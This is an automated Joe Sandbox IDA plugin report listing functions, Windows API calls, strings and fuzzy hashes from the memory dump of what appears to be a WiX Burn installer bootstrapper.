Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$Free$Compare
String ID: type$url
API String ID: 1324494773-1247773906
Opcode ID: f68f0ff9b5ad60442141faf5b09aaec6a10aabf15f99b3c93c71d14bd2fa02ed
Instruction ID: a3829318a2af81ac06a19ca55a7ed379694af9947e5ab7c422e85f3242871b2b
Opcode Fuzzy Hash: f68f0ff9b5ad60442141faf5b09aaec6a10aabf15f99b3c93c71d14bd2fa02ed
Instruction Fuzzy Hash: 3D515A75901219EBCF15DBA4C844FEEBBB8AF04711F1542AAE911EB2A1D7329E04DB60

Function 000D837F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000000,?,?,000B8E1F,000002C0,00000100), ref: 000D83AD
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,000B8E1F,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 000D83C8

Strings

apuputil.cpp, xrefs: 000D8463
application, xrefs: 000D83BA
type, xrefs: 000D83EF
http://appsyndication.org/2006/appsyn, xrefs: 000D83A0

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
API String ID: 2664528157-4206478990
Opcode ID: 4fb54bf6247be6899a88c859401aba352dbb7c714615b88e867a055fcc761cdc
Instruction ID: 870ca767cc06d69b14c1191cbea14951b54edea9044406786934034cf75e77f4
Opcode Fuzzy Hash: 4fb54bf6247be6899a88c859401aba352dbb7c714615b88e867a055fcc761cdc
Instruction Fuzzy Hash: 7951C031644702ABEF619F14CC86F6A77E5EF04760F20C216FA699B3D6DB71E9409B20

Function 000D635A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000D63B7
DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 000D64AE
CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 000D64BD

Strings

dlutil.cpp, xrefs: 000D63DB
Burn, xrefs: 000D63A6
DownloadTimeout, xrefs: 000D63F0
WiX\Burn, xrefs: 000D63F5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseDeleteErrorFileHandleLast
String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
API String ID: 3522763407-1704223933
Opcode ID: 024740055229327738ad7885d932555297b74861f18dffde61e975052faa6097
Instruction ID: b24d15a725e2f51ea2de4b30dbdaedb626722b4de3ccbd78616acc76e08d90fa
Opcode Fuzzy Hash: 024740055229327738ad7885d932555297b74861f18dffde61e975052faa6097
Instruction Fuzzy Hash: 39514D72D00619BBDF129FA4CC41EEEBBB9EF08710F014156FA14E6290E7368A51DBB0

Function 000A9080 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 000A910E

Part of subcall function 000D5587: GetLastError.KERNEL32(?,?,000A9133,?,00000003,00000000,?), ref: 000D55A6

_memcmp.LIBVCRUNTIME ref: 000A9148
GetLastError.KERNEL32 ref: 000A91C2

Strings

Failed to get certificate public key identifier., xrefs: 000A91F0
Failed to read certificate thumbprint., xrefs: 000A91B6
Failed to find expected public key in certificate chain., xrefs: 000A9183
cache.cpp, xrefs: 000A91E6

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast_memcmp
String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
API String ID: 3428363238-3408201827
Opcode ID: 6dff167b2c370599af2451650f3a99526c1c6e6ce2c23723bbb588300634ba59
Instruction ID: a112259926f0f8c1567fa50ffe426a39b244c410f3bd90e4aca4267b17565133
Opcode Fuzzy Hash: 6dff167b2c370599af2451650f3a99526c1c6e6ce2c23723bbb588300634ba59
Instruction Fuzzy Hash: B2415C71F00216AFDB50DBE9D845AAEB7F9AF09750F014129FA05FB251D674ED00CBA4

Function 000A0419 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 133registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,?,00000000,?), ref: 000A054A
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,?,00000000,?), ref: 000A0559

Part of subcall function 000D0AD5: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,000A0491,?,00000000,00020006), ref: 000D0AFA

Strings

Failed to open registration key., xrefs: 000A0591
%ls.RebootRequired, xrefs: 000A0467
Failed to delete registration key: %ls, xrefs: 000A04F8
Failed to update resume mode., xrefs: 000A052E
Failed to write volatile reboot required registry key., xrefs: 000A0495

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Close$Create
String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.
API String ID: 359002179-2517785395
Opcode ID: a3ed8e93db985b37a37520a7366e5e0d3ef6ab232b1126103fdcadc2a6bc5895
Instruction ID: cac0947bb03d13297f0193eed5b25f6200e436f3b264dba896673226bd895ddf
Opcode Fuzzy Hash: a3ed8e93db985b37a37520a7366e5e0d3ef6ab232b1126103fdcadc2a6bc5895
Instruction Fuzzy Hash: B7418032900718FFDF22AEB1DC02EEF7BB9AF45310F14442AFA4561152D7729A50DB61

Function 0009F69D Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0009F7CD
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0009F7DA

Strings

Resume, xrefs: 0009F741
Failed to format pending restart registry key to read., xrefs: 0009F6D1
Failed to open registration key., xrefs: 0009F736
Failed to read Resume value., xrefs: 0009F763
%ls.RebootRequired, xrefs: 0009F6BA

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: 972ad056646fbc57d7b69396785a1399f433c1ea8ff42df50774789ed9a8eb63
Instruction ID: 165f0da942a231fbf2143bb0c71fa370ee5439330deb8eb6ddab57cd89595e31
Opcode Fuzzy Hash: 972ad056646fbc57d7b69396785a1399f433c1ea8ff42df50774789ed9a8eb63
Instruction Fuzzy Hash: E1414D3690421AEFCF11AFD9C881AFDFBA5FB05311F258176E914EB251C3719E50AB90

Function 000AA7FA Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON

Download Yara Rule

Strings

WixBundleLastUsedSource, xrefs: 000AA899, 000AA89F, 000AA8DB
Failed to trim source folder., xrefs: 000AA88F
Failed to set last source., xrefs: 000AA8EA
Failed to determine length of source path., xrefs: 000AA82A
Failed to determine length of relative path., xrefs: 000AA847

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID:
String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
API String ID: 0-660234312
Opcode ID: 45a6af23964b15d1bdb6945a7583b4610c224caddd08310c1a1eac9a3a887909
Instruction ID: cf58bfce859a95054221e256ede6bf889acd926308966bd7ed0018410a56246a
Opcode Fuzzy Hash: 45a6af23964b15d1bdb6945a7583b4610c224caddd08310c1a1eac9a3a887909
Instruction Fuzzy Hash: BD31D632E04229BFDF219A94CC05EAEB779AF02760F114266F920B61D1EB359E41D791

Function 000BD677 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(000F0A84,00000000,00000017,000F0A94,?,?,00000000,00000000,?,?,?,?,?,000BDCAE,00000000,00000000), ref: 000BD6AF

Strings

Failed to set BITS job to foreground., xrefs: 000BD730
Failed to create IBackgroundCopyManager., xrefs: 000BD6BB
Failed to set notification flags for BITS job., xrefs: 000BD701
WixBurn, xrefs: 000BD6DA
Failed to set progress timeout., xrefs: 000BD719
Failed to create BITS job., xrefs: 000BD6E9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CreateInstance
String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
API String ID: 542301482-468763447
Opcode ID: 7e0f236c7e9dc7deab21981b671e4462e01808d288d3cfa5ce6267d5a6765c19
Instruction ID: 5964d69b8a8b1ae62f2bf2115f6925d0f3a4bbe021d478700417f2a4ef246fbf
Opcode Fuzzy Hash: 7e0f236c7e9dc7deab21981b671e4462e01808d288d3cfa5ce6267d5a6765c19
Instruction Fuzzy Hash: 9E317E31B4121AAFD715CFA8C855EFFBBB4EF48710B10016AEA05EB351EA70AC01DB91

Function 000D5C68 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 000D5CB2
GetLastError.KERNEL32 ref: 000D5CBF
ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 000D5D06
CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 000D5D6E

Strings

dlutil.cpp, xrefs: 000D5CE3, 000D5D5E
%ls.R, xrefs: 000D5C86

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastRead
String ID: %ls.R$dlutil.cpp
API String ID: 2136311172-657863730
Opcode ID: 84db46fa5fdfd639cd1a03db3e525a8ccc3330173f184f34c27342e372626352
Instruction ID: b48490823dfcf82816c5c510696171abe630781a0bb95eaae56f063e0bc30ac4
Opcode Fuzzy Hash: 84db46fa5fdfd639cd1a03db3e525a8ccc3330173f184f34c27342e372626352
Instruction Fuzzy Hash: 2E31C172A01714AFEB208B68CC49BAA7BE9EF05761F11421AFE15EB2D0D7748D0196B1

Function 000BD12C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,000BD439,?), ref: 000BD145
ReleaseMutex.KERNEL32(?,?,?,?,000BD439,?), ref: 000BD161
WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BD1A4
ReleaseMutex.KERNEL32(?), ref: 000BD1BB
SetEvent.KERNEL32(?), ref: 000BD1C4

Strings

Failed to get message from netfx chainer., xrefs: 000BD1E5
Failed to send files in use message from netfx chainer., xrefs: 000BD20A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: MutexObjectReleaseSingleWait$Event
String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
API String ID: 2608678126-3424578679
Opcode ID: 1a30549ae20a85472f93b9fc680797e8a70666d5a26f713160387395112c16b4
Instruction ID: f8e7ca8a950bbeefd85af0c53770304b9f6549c8ccad68eaf6e8909a2e33ef76
Opcode Fuzzy Hash: 1a30549ae20a85472f93b9fc680797e8a70666d5a26f713160387395112c16b4
Instruction Fuzzy Hash: 6B31C831900649AFDB119F94CC08EEEBBF5EF54320F10866AF915A6261D735D9009B90

Function 000D082D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 000D089A
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 000D08A4
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 000D08ED
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 000D08FA

Strings

"%ls" %ls, xrefs: 000D0863
procutil.cpp, xrefs: 000D08C8
D, xrefs: 000D0882

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastProcess
String ID: "%ls" %ls$D$procutil.cpp
API String ID: 161867955-2732225242
Opcode ID: 8b20e835f8b74254c488b9ca61c82d497988802fb44a19bc938fdf109ecc6bd8
Instruction ID: 79128c9ff76238320fe395aa2368461661d39f52d55894fdd4b7a8478ae3e029
Opcode Fuzzy Hash: 8b20e835f8b74254c488b9ca61c82d497988802fb44a19bc938fdf109ecc6bd8
Instruction Fuzzy Hash: DB212A71D0021EEFDB10AFE5CD40AEEBBB9EF04714F110026EA04B6251D7705E009BB1

Function 00099A6D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00099A86
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0009A7A9,00000100,000002C0,000002C0,00000100), ref: 00099AA6
GetLastError.KERNEL32(?,0009A7A9,00000100,000002C0,000002C0,00000100), ref: 00099AB1

Strings

Failed while searching directory search: %ls, for path: %ls, xrefs: 00099B06
Failed to set directory search path variable., xrefs: 00099AE1
Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00099B1C
Failed to format variable string., xrefs: 00099A91

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-2966038646
Opcode ID: b1dacd3d383485da0b4c3feac375460691617ebd3704649d1f2351d1fc400af7
Instruction ID: 20ccb1a9e43e06ae2d681f897dd7ee96756d3ba031cc7a3322253e7489fefa9e
Opcode Fuzzy Hash: b1dacd3d383485da0b4c3feac375460691617ebd3704649d1f2351d1fc400af7
Instruction Fuzzy Hash: 7B110832940224FBDF22669CDD02FDEBB65EF10360F21011AFD147A261D7268D10B6E6

Function 00099C39 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00099C52
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0009A781,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00099C72
GetLastError.KERNEL32(?,0009A781,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00099C7D

Strings

Failed to set variable to file search path., xrefs: 00099CD4
Failed while searching file search: %ls, for path: %ls, xrefs: 00099CAA
File search: %ls, did not find path: %ls, xrefs: 00099CE0
Failed to format variable string., xrefs: 00099C5D

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
API String ID: 1811509786-3425311760
Opcode ID: bc6fbf72393f20e82c894cd112d1dfea3dfc7d04aec8c0713ee69f16a7de88ea
Instruction ID: ca7a3e18f8a0b22b2a3d7beabc3147d7d3c972578b125cc62d8abd03a1d7dd2f
Opcode Fuzzy Hash: bc6fbf72393f20e82c894cd112d1dfea3dfc7d04aec8c0713ee69f16a7de88ea
Instruction Fuzzy Hash: 3511E736940225F7DF223698CE42B9DBBA5EF00720F20411AFD04BA2A1D7269D50B7E5

Function 000A444C Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

_memcpy_s.LIBCMT ref: 000A449E
_memcpy_s.LIBCMT ref: 000A44B1
_memcpy_s.LIBCMT ref: 000A44CC

Strings

feclient.dll, xrefs: 000A4466, 000A449C
pipe.cpp, xrefs: 000A447D
@G, xrefs: 000A4454
Failed to allocate memory for message., xrefs: 000A4487

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: _memcpy_s$Heap$AllocateProcess
String ID: @G$Failed to allocate memory for message.$feclient.dll$pipe.cpp
API String ID: 886498622-2658273809
Opcode ID: f8c39e5f86359903d9d99e7e6a4eec469f394e71418070d4b52c3ab828d82a8c
Instruction ID: 0938258a6ff697a26d6f15ef159ba03898df1d85afb8f41a50b1c44cdbef617b
Opcode Fuzzy Hash: f8c39e5f86359903d9d99e7e6a4eec469f394e71418070d4b52c3ab828d82a8c
Instruction Fuzzy Hash: 501151B660031DABDB119E91CC86DDBB7ACEF49710F00452AFA159B142EBB0DA10CBE1

Function 000ACCF4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,000AD134,00000000,?,?,000AC59C,00000001,?,?,?,?,?), ref: 000ACD06
GetLastError.KERNEL32(?,?,000AD134,00000000,?,?,000AC59C,00000001,?,?,?,?,?,00000000,00000000,?), ref: 000ACD10
GetExitCodeThread.KERNEL32(00000001,?,?,?,000AD134,00000000,?,?,000AC59C,00000001,?,?,?,?,?,00000000), ref: 000ACD4C
GetLastError.KERNEL32(?,?,000AD134,00000000,?,?,000AC59C,00000001,?,?,?,?,?,00000000,00000000,?), ref: 000ACD56

Strings

Failed to wait for cache thread to terminate., xrefs: 000ACD3E
Failed to get cache thread exit code., xrefs: 000ACD84
elevation.cpp, xrefs: 000ACD34, 000ACD7A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
API String ID: 3686190907-1954264426
Opcode ID: 95488c3246c03899f70658290a932a07870d3f5a4a233b544ed0e2090155599e
Instruction ID: 91e1da5de620c6296304ab612fe63046b42348e819b046519ecdfa8377f29dab
Opcode Fuzzy Hash: 95488c3246c03899f70658290a932a07870d3f5a4a233b544ed0e2090155599e
Instruction Fuzzy Hash: DB012172B41334ABFB2057B55D05BAB7AD8DF05791F020126FE05F6190D7548D0055F5

Function 000A67B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,000A6CFB,@G,?,00000000,?,00000000,00000001), ref: 000A67BD
GetLastError.KERNEL32(?,000A6CFB,@G,?,00000000,?,00000000,00000001), ref: 000A67C7
GetExitCodeThread.KERNEL32(00000001,00000000,?,000A6CFB,@G,?,00000000,?,00000000,00000001), ref: 000A6806
GetLastError.KERNEL32(?,000A6CFB,@G,?,00000000,?,00000000,00000001), ref: 000A6810

Strings

Failed to wait for cache thread to terminate., xrefs: 000A67F8
Failed to get cache thread exit code., xrefs: 000A6841
core.cpp, xrefs: 000A67EB, 000A6834

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
API String ID: 3686190907-2546940223
Opcode ID: 1d5fb9d2687a87a649b8bac0451b6e9f80490fbd427ca12edcc1cfa68ee59128
Instruction ID: 6001c906a544cef7d631f43529dff02e1c185b24e91351416fa3c00261647588
Opcode Fuzzy Hash: 1d5fb9d2687a87a649b8bac0451b6e9f80490fbd427ca12edcc1cfa68ee59128
